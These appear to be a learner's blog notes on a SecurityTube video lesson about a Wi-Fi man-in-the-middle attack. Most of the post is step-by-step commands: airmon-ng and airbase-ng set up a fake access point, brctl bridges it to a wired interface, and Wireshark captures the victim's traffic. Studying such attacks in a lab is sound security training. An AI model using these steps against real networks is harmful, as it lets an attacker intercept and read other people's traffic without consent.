SecurityTube, Wireless Lan Security Megaprimer notes: part 12 (A Man-In-The-Middle Attack)

Vivek’s video is here.

In the unencrypted man in the middle attack, we deauth the client from the regular AP and reconnect it to our own fake AP.

We can either connect the client to a new wired (or 3G) internet connection or we can connect back to the real AP.

In our setup we’re going to get our victim to connect to our fake AP, and then send the traffic out to the internet via a different access point.

We’ll use the alfa card to create a fake AP. We’ll use the laptops built in wifi card to connect to our other AP.

0. Setup your network card in VirtualBox/VMWare, using “NAT” is probably your best option.

1. Bring up eth0 in backtrack

ifconfig eth0 up

2. Bring up an access point with SSID SecurityTube

ifconfig wlan0 up
airmon-ng start wlan0
iwconfig wlan0 channel 1
airbase-ng -ssid SecurityTube mon0

3. Bridge the interfaces

Run this in a new terminal window:

ifconfig at0 up
brctl addbr mitm
brctl show #will show the bridge, but no interfaces added
brctl addif mitm eth0
brctl addif mitm at0
ifconfig eth0 up  #not sure why this is needed!
ifconfig at0 up

If you do ifconfig, you’ll see a new bridge, mitm. Bring up the interface:

ifconfig mitm
dhclient3 mitm

The dhclient command, gets an IP address, this will come from the virtualbox dhcp server.

4. Go to the airbase-ng window. Connect a device to the fake network you created.

The device will get a IP address from VirtualBox.

5. Open up wireshark, start a capture on at0. Open a webpage on your client.

You should see a lot of traffic in wireshark. You should be able to view pages on your client via the laptops internet connect.

All packets have to go though us, this is a little better than passively sniffing cleartext packets and all packets /MUST/ go through us.